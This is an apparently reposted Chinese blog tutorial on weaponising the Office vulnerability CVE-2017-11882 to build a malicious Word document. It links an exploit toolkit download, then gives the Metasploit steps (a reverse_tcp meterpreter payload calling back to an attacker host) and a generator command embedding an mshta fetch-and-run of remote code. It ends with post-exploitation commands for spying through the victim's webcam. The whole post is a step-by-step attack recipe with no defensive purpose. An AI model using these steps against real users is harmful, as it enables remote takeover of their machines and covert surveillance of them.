cve-2017-11882生成office恶意文件
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了cve-2017-11882生成office恶意文件相关的知识,希望对你有一定的参考价值。
2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882)。该漏洞为Office内存破坏漏洞,影响目前流行的所有Office版本。×××者可以利用漏洞以当前登录的用户的身份执行任意命令。漏洞影响版本:Office 365
Microsoft Office 2000
Microsoft Office 2003
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2
Microsoft Office 2013 Service Pack 1
Microsoft Office 2016
工具链接:https://pan.baidu.com/s/1cAPboI5lawjxD2VPT13ABA 密码:fxrf
还是老样子KaliLinux做gongji机 ip:192.168.1.126
受害者主机Windows7 ip:192.168.1.128
1.首先把cve开头的文件放到kalilinux使用
2.将cve_2017_11882.rb文件复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/目录下
mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
ls /usr/share/metasploit-framework/modules/exploits/windows/smb/ 查看一下
3.再将cve_2017_11882.rtf放到/usr/share/metasploit-framework/data/exploits/ 目录下
mv cve_2017_11882.rtf /usr/share/metasploit-framework/data/exploits
ls /usr/share/metasploit-framework/data/exploits
4.打开神器图形化操作的msf(命令都一样只是这个更容易方便演示)
为了你们太萌新我特地标了一下如何扫描ip地址和爆系统然后输入ip地址即可(只是为了效果好而已)
小电脑就出来了还猜出来是Windows7
5.然后在下面输入search cve_2017_11882查看有没有加载进去这个模块
可能我版本比较高所以官方已经出了这个模块所以有两个
6.use exploit/windows/smb/cve_2017_11882 使用这个模块
7.set payload windows/meterpreter/reverse_tcp
show options 查看一下配置
8.set lhost 192.168.1.126 为自己的×××机
set uripath emmm emmm为路径稍后用python生成脚本的时候用得到(后面我又改成test了 然后 set lport 4444改一下端口才运行)
show options 再看一下配置
(后面uripath我又改成test了 然后 set lport 4444改一下端口才运行)
9.exploit -j 运行
10.在终端生成doc文件
python Command109b_CVE-2017-11882.py -c "mshta http://192.168.1.126:8080/test" -o test.doc 生成doc文件
然后将doc文件放到Windows7上(顺便安装office)
看到这个文档然后手贱点了一下
成功
然后还是老样子
getuid getpid getvnc
webcam_list 查看下摄像头 webcam_snf 1 照个照片 webcam_stream 开个网页查看摄像头
以上是关于cve-2017-11882生成office恶意文件的主要内容,如果未能解决你的问题,请参考以下文章
[漏洞复现] CVE-2017-11882 通杀所有office版本